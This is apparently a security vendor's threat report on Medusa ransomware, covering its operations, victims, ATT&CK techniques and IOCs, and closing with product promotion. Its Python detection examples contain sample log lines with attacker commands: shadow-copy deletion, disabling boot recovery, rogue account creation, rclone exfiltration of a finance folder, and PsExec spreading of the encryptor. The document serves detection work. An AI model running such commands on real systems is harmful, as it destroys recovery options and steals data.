Medusa Ransomware: What It Is and How Xcitium Keeps You Safe

Medusa ransomware is a rising ransomware-as-a-service threat leveraging double extortion tactics.

Introduction

A ransomware variant known as Medusa is quickly growing in notoriety by pairing aggressive double extortion with the expanding Ransomware-as-a-Service (RaaS) model. The malware both encrypts data and exfiltrates it beforehand, and the stolen data is usually sensitive. A business that does not pay to prevent public disclosure therefore faces not only operational disruption but also the regulatory and legal consequences of a data breach at the hands of the Medusa gang. Medusa's rise is part of a broader increase in the rate of ransomware attacks.

Medusa’s Rise Amid a Ransomware Surge

The global number of recorded ransomware attacks has risen sharply, and Medusa's growth tracks that trend. The first attack attributed to Medusa ransomware was observed in mid-2021. By 2023 it ranked among the ten most active ransomware operations, and in the first quarter of 2025 the number of recorded ransomware incidents was more than double that of the first quarter of the previous year. The law-enforcement disruption of LockBit and the disappearance of ALPHV/BlackCat in 2024 left space in the market that newer players such as Medusa moved to fill. Medusa's business model recruits outside affiliates, often initial access brokers, to raise the attack rate, while the core developers keep control of ransom negotiations.

Medusa is an independent operation with no ties to other malware families that share the name: it is not the older MedusaLocker ransomware and not the Medusa Android banking malware. Intelligence assessments place the operators in Russia or allied regions; the group avoids Russian and CIS-based organizations and recruits on Russian-speaking cybercrime forums. By 2025 U.S. authorities treated Medusa as a serious threat, and in March 2025 the FBI, CISA and MS-ISAC published a joint #StopRansomware advisory (AA25-071A) on it.

How Medusa Ransomware Works

  • Initial Access: In many cases Medusa actors buy access from Initial Access Brokers (IABs), who obtain it by phishing for credentials, credential stuffing, or exploiting known vulnerabilities and then resell the footholds to ransomware crews such as Medusa. Affiliates also exploit unpatched software common in their targets' environments directly; documented entry points include CVE-2024-1709, an authentication bypass in ConnectWise ScreenConnect, and CVE-2023-48788, a SQL injection in Fortinet FortiClient EMS. Phishing campaigns against the target's own users round out the initial-access methods.
  • Inside the Network: Once inside, the attackers focus on escalating privileges and locating valuable data, scanning hosts and file shares for sensitive files. Before encryption begins they exfiltrate that data to attacker-controlled storage (Rclone is the tool most often reported), using living-off-the-land tooling such as PowerShell for discovery and staging. Only after the data has been stolen does the encryptor run, appending a ".MEDUSA" extension to each encrypted file.
  • Ransom Demand: A note named "!!!READ_ME_MEDUSA!!!.txt" is dropped on compromised systems. It contains the attackers' contact channels, the victim's designated ID and threatening language, and it gives the victim 48 hours to respond. If no response arrives within that window the attackers escalate, contacting the victim directly by phone or e-mail to raise the pressure. The breach is then advertised on the Medusa leak site with a countdown timer, after which the stolen data is published or sold to other criminals or bidders. In at least one case reported in the FBI/CISA advisory, a victim who had already paid was contacted by a second Medusa actor claiming the negotiator had stolen the ransom and demanding a further payment for the "true" decryption key, a form of triple extortion that shows how little a payment actually buys.

Notable Medusa Ransomware Attacks

Medusa has hit organizations across many industries and several continents, which shows the indiscriminate nature of the gang. By early 2025 the group and its affiliates had claimed more than 300 victims in sectors including education, healthcare, legal services, insurance, technology and manufacturing. One of the most widely reported incidents was the 2023 attack on Minneapolis Public Schools, which led to the leak of sensitive records on more than 100,000 people, including students' psychological evaluations.

Government and public-sector bodies have been affected as well: Medusa operators have attacked government agencies in the Pacific island nation of Tonga, several municipalities in France and a government office in the Philippines, and agencies in Illinois and Texas in the United States have also been hit. Critical infrastructure and essential public services are therefore within the group's targeting.

Private companies are no less exposed. One example is a technology firm co-founded by two of Canada's largest banks that was listed on Medusa's leak site. The group also runs quieter extortion campaigns against small and medium-sized businesses in the Americas and Asia. The breadth of its target list makes clear that no business is immune, and that every industry needs to prepare for an attack of this kind.

Technical Analysis Summary

The Medusa encryptor (often named gaze.exe) encrypts victim files with AES-256 and appends a .MEDUSA extension. Before encrypting, it stops services and deletes Volume Shadow Copies (T1490) to prevent recovery, and it disables endpoint defenses with techniques such as Bring Your Own Vulnerable Driver (BYOVD) to kill security processes. Key behaviors include:

  • Encryption: AES-256 symmetric encryption; encrypted files use “.MEDUSA” extension.
  • Payload behavior: Terminates system services and security processes, deletes shadow copies (VSS) to thwart recovery.
  • Persistence: Writes a registry Run key (HKLM\…\MDSLK) and may create new accounts (T1136.002) for continued access.
  • Lateral movement: Uses Remote Desktop (T1021.001) and PsExec (T1569.002) to spread the encryptor across networks.

MITRE ATT&CK Tactics, Techniques, and Procedures (TTPs)

Medusa’s attack chain maps to multiple MITRE ATT&CK tactics. Key mapped techniques include:

  • Initial Access (TA0001): Exploit Public-Facing Application (T1190), Phishing (T1566).
  • Defense Evasion (TA0005): Clear command history (T1070.003), obfuscated scripts (T1027/T1027.013), disabling security tools (T1562.001).
  • Discovery (TA0007): Network/service and system discovery (T1046, T1135, T1082, T1083).
  • Credential Access (TA0006): OS credential dumping (LSASS memory, T1003.001).
  • Execution (TA0002): PowerShell (T1059.001) and Windows Management Instrumentation (T1047).
  • Lateral Movement (TA0008): RDP (T1021.001) and remote service execution via PsExec (T1569.002).
  • Exfiltration (TA0010): Cloud storage exfiltration via Rclone (T1567.002).
  • Command & Control (TA0011): HTTPS tunnels (T1071.001) and remote access software (T1219).
  • Persistence (TA0003): Create account (T1136.002).
  • Impact (TA0040): Data encryption (T1486) and recovery inhibition (T1490).
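The behaviors in the Technical Analysis Summary and the ATT&CK list above are what a detection engineer turns into rules. The following is an added example, not Xcitium's product logic and not code from the Medusa operation: a small Python detector that applies regex rules for shadow-copy deletion, boot-recovery tampering, account creation, PsExec, Rclone and Run-key writes to process-creation log lines. The log format, host names and command lines are constructed for the example. The rules generalize slightly beyond the text: they also catch wmic and PowerShell shadow-copy deletion, bcdedit recovery tampering, and local account creation (T1136.001) alongside domain accounts (T1136.002).

```python
"""Behavioural detections for the Medusa TTPs described above, run over
constructed process-creation log lines. Added example; not Xcitium's product
logic and not code from the Medusa operation."""
import re

# (ATT&CK technique, label, regex applied to the process command line).
# Generalises slightly beyond the text: wmic/PowerShell shadow-copy deletion
# beside vssadmin, bcdedit recovery tampering, and local account creation.
RULES = [
    ("T1490", "Inhibit System Recovery: shadow copies deleted", re.compile(
        r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b"
        r"|\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"
        r"|Win32_ShadowCopy\b.*\.Delete\(\)", re.I)),
    ("T1490", "Inhibit System Recovery: boot recovery disabled", re.compile(
        r"\bbcdedit(?:\.exe)?\b.*\b(?:recoveryenabled\s+no"
        r"|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("T1136.002", "Create Account: domain account", re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b.*/domain\b", re.I)),
    ("T1136.001", "Create Account: local account", re.compile(
        r"^(?!.*/domain).*\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("T1569.002", "Service Execution: PsExec against a remote host", re.compile(
        r"\bpsexec(?:64)?(?:\.exe)?\b.*\\\\", re.I)),
    ("T1567.002", "Exfiltration to Cloud Storage: rclone to a remote", re.compile(
        # a remote name is at least two chars before the colon, so C:\ paths don't count
        r"\brclone(?:\.exe)?\b\s+(?:copy|sync|move)\b.*\s\w{2,}:", re.I)),
    ("T1547.001", "Registry Run key written", re.compile(
        r"\breg(?:\.exe)?\s+add\s+HK(?:LM|CU)\\.*\\CurrentVersion\\Run\b", re.I)),
]

# Assumed log layout: key=value pairs with the command line in double quotes.
LINE_RE = re.compile(r'host=(?P<host>\S+).*?cmdline="(?P<cmd>[^"]*)"')


def detect(lines):
    """Return one hit per (line, rule) match: host, technique, label, command line."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        cmd = m.group("cmd")
        for tech, label, pat in RULES:
            if pat.search(cmd):
                hits.append({"host": m.group("host"), "technique": tech,
                             "label": label, "cmdline": cmd})
    return hits


def techniques_by_host(hits):
    """Group distinct techniques per host; a host stacking T1490 with exfil or
    lateral-movement techniques is the ransomware-staging pattern described above."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], set()).add(h["technique"])
    return {host: sorted(t) for host, t in by_host.items()}


# Constructed sample log: hosts, users and command lines are made up for this example.
SAMPLE_LOG = r"""
2025-03-12T09:58:10Z host=WS-114 user=CORP\jdoe event=ProcessCreate cmdline="vssadmin.exe list shadows"
2025-03-12T10:02:31Z host=FS01 user=CORP\svc_backup event=ProcessCreate cmdline="vssadmin.exe delete shadows /all /quiet"
2025-03-12T10:02:33Z host=FS01 user=CORP\svc_backup event=ProcessCreate cmdline="wmic.exe shadowcopy delete /nointeractive"
2025-03-12T10:02:35Z host=FS01 user=CORP\svc_backup event=ProcessCreate cmdline="bcdedit.exe /set {default} recoveryenabled no"
2025-03-12T10:03:02Z host=DC01 user=CORP\svc_backup event=ProcessCreate cmdline="net user medusaadm P@ssw0rd! /add /domain"
2025-03-12T10:04:40Z host=FS01 user=CORP\svc_backup event=ProcessCreate cmdline="rclone.exe copy D:\Finance mega:exfil --transfers 8 -q"
2025-03-12T10:05:12Z host=FS01 user=CORP\svc_backup event=ProcessCreate cmdline="psexec.exe \\10.0.0.25 -s -d -c gaze.exe"
2025-03-12T10:05:20Z host=WS-117 user=CORP\svc_backup event=ProcessCreate cmdline="reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svc /t REG_SZ /d C:\ProgramData\svc.exe"
2025-03-12T10:06:00Z host=WS-114 user=CORP\jdoe event=ProcessCreate cmdline="powershell.exe Get-Process"
""".strip().splitlines()

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(f'{hit["host"]:7} {hit["technique"]:10} {hit["label"]}: {hit["cmdline"]}')
    print(techniques_by_host(detect(SAMPLE_LOG)))
```

Running the block against the sample flags seven events; the benign `vssadmin list shadows` and `Get-Process` lines produce nothing. FS01 stacks T1490, T1567.002 and T1569.002 within a few minutes, which is the sequence to alert on as a unit rather than as seven separate events.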

Indicators of Compromise (IOCs)

Medusa ransomware infections produce distinctive IOCs in files and network traffic. Malicious filenames include !!!READ_ME_MEDUSA!!!.txt (the ransom note) and executables such as gaze.exe and svhost.exe (note the missing "c", mimicking the legitimate svchost.exe). Encrypted files typically carry the extension .MEDUSA or .mylock. Hashes and network infrastructure rotate between affiliates and campaigns, so treat the following as examples to validate against a current threat-intelligence feed rather than as a complete blocklist:

  • Files: !!!READ_ME_MEDUSA!!!.txt (ransom note), gaze.exe (the encryptor, distributed to hosts with the PDQ Deploy software-deployment tool), svhost.exe.
  • File hashes: SHA-256 657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980, one of many published samples.
  • Domains/URLs: the Tor hidden service medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion, and go-sw6-02.adventos[.]de.
  • IP addresses: known C2 addresses such as 195.123.246.138 and 185.220.100.249.
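An added example, not Xcitium code, that sweeps the indicators above over constructed data: a Python script that refangs the published indicators, matches file-inventory rows (path plus SHA-256) against the hash, filename and extension indicators, and matches DNS queries and destination IPs against the domain and IP indicators. The inventory rows, log format, internal addresses and every digest other than the one published above are made up for the example.

```python
"""Atomic-IOC sweep for the Medusa indicators listed above, run over constructed
file-inventory rows and network log lines. Added example, not Xcitium tooling."""
import ntpath
import re


def refang(indicator: str) -> str:
    """Turn a defanged indicator (as published in advisories) into a matchable form."""
    return indicator.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


# Indicators from the IOC section above. Affiliates rotate hashes and
# infrastructure, so refresh this set from the current FBI/CISA advisory.
IOC_SHA256 = {"657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980"}
IOC_DOMAINS = {refang(d).lower() for d in (
    # .onion names never reach a resolver over Tor; they show up only in proxy/Tor2web logs
    "medusakxxtp3uo7vusntvubnytaph4d3amxivbggl3hnhpk2nmus34yd.onion",
    "go-sw6-02.adventos[.]de",
)}
IOC_IPS = {"195.123.246.138", "185.220.100.249"}
IOC_FILENAMES = {"!!!read_me_medusa!!!.txt", "gaze.exe", "svhost.exe"}  # compared lower-cased
IOC_EXTENSIONS = {".medusa", ".mylock"}


def scan_inventory(rows):
    """rows: 'path,sha256' strings. Returns {path: [reasons]} for every match."""
    flagged = {}
    for row in rows:
        row = row.strip()
        if not row or row.startswith("#"):
            continue
        path, digest = row.rsplit(",", 1)
        name = ntpath.basename(path).lower()   # Windows paths are case-insensitive
        reasons = []
        if digest.lower() in IOC_SHA256:
            reasons.append("known_hash")
        if name in IOC_FILENAMES:
            reasons.append("known_filename")
        if ntpath.splitext(name)[1] in IOC_EXTENSIONS:
            reasons.append("ransomware_extension")
        if reasons:
            flagged[path] = reasons
    return flagged


# Assumed log layout: src=..., then either dst=<ip> (flow log) or query=<name> (DNS log).
NET_RE = re.compile(r"src=(?P<src>\S+).*?(?:dst=(?P<dst>\S+)|query=(?P<query>\S+))")


def scan_network(lines):
    """Return (source, indicator) pairs for destination IPs and DNS names on the lists."""
    hits = []
    for line in lines:
        m = NET_RE.search(line)
        if not m:
            continue
        if m.group("dst") in IOC_IPS:
            hits.append((m.group("src"), m.group("dst")))
        query = (m.group("query") or "").lower().rstrip(".")
        if query in IOC_DOMAINS:
            hits.append((m.group("src"), query))
    return hits


# Constructed sample data. Digests other than the published one are placeholders.
SAMPLE_INVENTORY = r"""
# path,sha256
C:\Windows\System32\svchost.exe,1111111111111111111111111111111111111111111111111111111111111111
C:\Users\Public\svhost.exe,2222222222222222222222222222222222222222222222222222222222222222
C:\Users\Public\gaze.exe,657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980
D:\Finance\Q1.xlsx.MEDUSA,3333333333333333333333333333333333333333333333333333333333333333
D:\Finance\!!!READ_ME_MEDUSA!!!.txt,4444444444444444444444444444444444444444444444444444444444444444
C:\Users\jdoe\report.docx,5555555555555555555555555555555555555555555555555555555555555555
""".strip().splitlines()

SAMPLE_NETWORK = """
2025-03-12T10:10:01Z src=10.0.0.25 dst=195.123.246.138 dport=443 proto=tcp
2025-03-12T10:10:05Z src=10.0.0.25 dst=198.51.100.7 dport=443 proto=tcp
2025-03-12T10:11:09Z src=10.0.0.31 query=go-sw6-02.adventos.de. type=A
2025-03-12T10:11:15Z src=10.0.0.31 query=login.example.com. type=A
2025-03-12T10:12:00Z src=10.0.0.25 dst=185.220.100.249 dport=9001 proto=tcp
""".strip().splitlines()

if __name__ == "__main__":
    for path, reasons in scan_inventory(SAMPLE_INVENTORY).items():
        print(f"{path}: {', '.join(reasons)}")
    for src, indicator in scan_network(SAMPLE_NETWORK):
        print(f"{src} -> {indicator}")
```

On the sample data the legitimate System32\svchost.exe is left alone while the look-alike svhost.exe, gaze.exe (by both name and hash), the .MEDUSA-suffixed spreadsheet and the ransom note are flagged; on the network side both listed C2 addresses and the adventos domain match. Atomic indicators like these age quickly, which is why they belong alongside the behavioral rules rather than in place of them.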

Case Study: Xcitium vs. Medusa Ransomware

In a recent controlled test, Xcitium's endpoint security platform was run against a Medusa ransomware sample, a family notorious for double extortion and aggressive encryption. As the sample attempted to execute and begin encrypting system files, Xcitium's patented ZeroDwell Containment isolated it before its payload could run.

This pre-execution containment prevented data loss, system damage and encryption of data without interrupting business activity. The result demonstrates Xcitium's approach of neutralizing ransomware before it can damage systems, rather than detecting it after the fact.

Conclusion: Xcitium ZeroDwell – Proactive Ransomware Defense

Xcitium's patented ZeroDwell technology prevents threats such as Medusa ransomware in real time by running unknown files and processes inside a secure virtual container. Even when a phishing e-mail or zero-day exploit gets past detection and delivers the malware to the endpoint, the payload executes only inside the container, where it cannot modify the host. The malware therefore has no dwell time on the network: it can neither encrypt data nor reach its C2 servers.

Because Xcitium relies on runtime containment rather than signature-based detection alone, it can stop ransomware and other advanced attacks from damaging systems even when the sample has never been seen before. With aggressive RaaS operations like Medusa on the rise, that kind of real-time protection matters. Organizations that combine ZeroDwell containment with sound security hygiene (patching the exposed services Medusa exploits, multi-factor authentication on remote access, and offline backups that survive shadow-copy deletion) are far better placed to withstand a Medusa attack.
